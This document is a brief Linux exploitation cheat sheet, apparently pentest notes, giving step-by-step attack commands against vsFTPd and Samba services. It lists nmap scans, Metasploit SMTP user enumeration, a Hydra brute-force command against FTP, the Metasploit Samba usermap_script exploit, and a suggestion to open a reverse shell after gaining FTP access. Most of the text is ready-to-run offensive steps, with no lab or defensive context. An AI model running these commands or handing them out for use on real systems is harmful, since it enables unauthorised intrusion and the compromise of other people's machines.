Linux Exploitation

Port Scanning & Enumeration

1. cat /etc/hosts

   • Display the contents of the /etc/hosts file.

2. nmap -sV -p 1-10000 <ip> -oN nmap_10k.txt

   • Conduct an Nmap scan with version detection on ports 1 to 10000 of the specified IP and save the output to the file "nmap_10k.txt".

3. If you're unable to determine a proper service name, you can use netcat to grep the banner for that service. It's recommended to perform manual banner grepping for accurate results.

Targeting vsFTPd

1. nmap -sV -sC -p 21 <ip>

   • Perform an Nmap scan with version detection and default scripts on port 21 (FTP) of the specified IP.

2. auxiliary/scanner/smtp/smtp_enum

   • Use this Metasploit auxiliary module to enumerate users via the SMTP service.

3. hydra -l <username> -P /usr/share/metasploit-framework/data/wordlists/unix_users.txt <ip> ftp

   • Employ Hydra to perform a brute-force attack using a list of Unix usernames and a common password list against the FTP service on the specified IP.

4. After gaining access to the FTP server, consider attempting to establish a reverse shell on the server.

Targeting SAMBA

1. nmap -sV -p 445 <ip>

   • Perform an Nmap scan with version detection on port 445 (SMB) of the specified IP.

2. auxiliary/scanner/smb/smb_version

   • Use this Metasploit auxiliary module to identify the version of the SMB service.

3. exploit/multi/samba/usermap_script

   • Employ this Metasploit exploit module to leverage the Samba usermap script vulnerability.

Hacker's Mantra:As the world becomes more digitized, there are more entry points for hackers. - Michael Demon Calce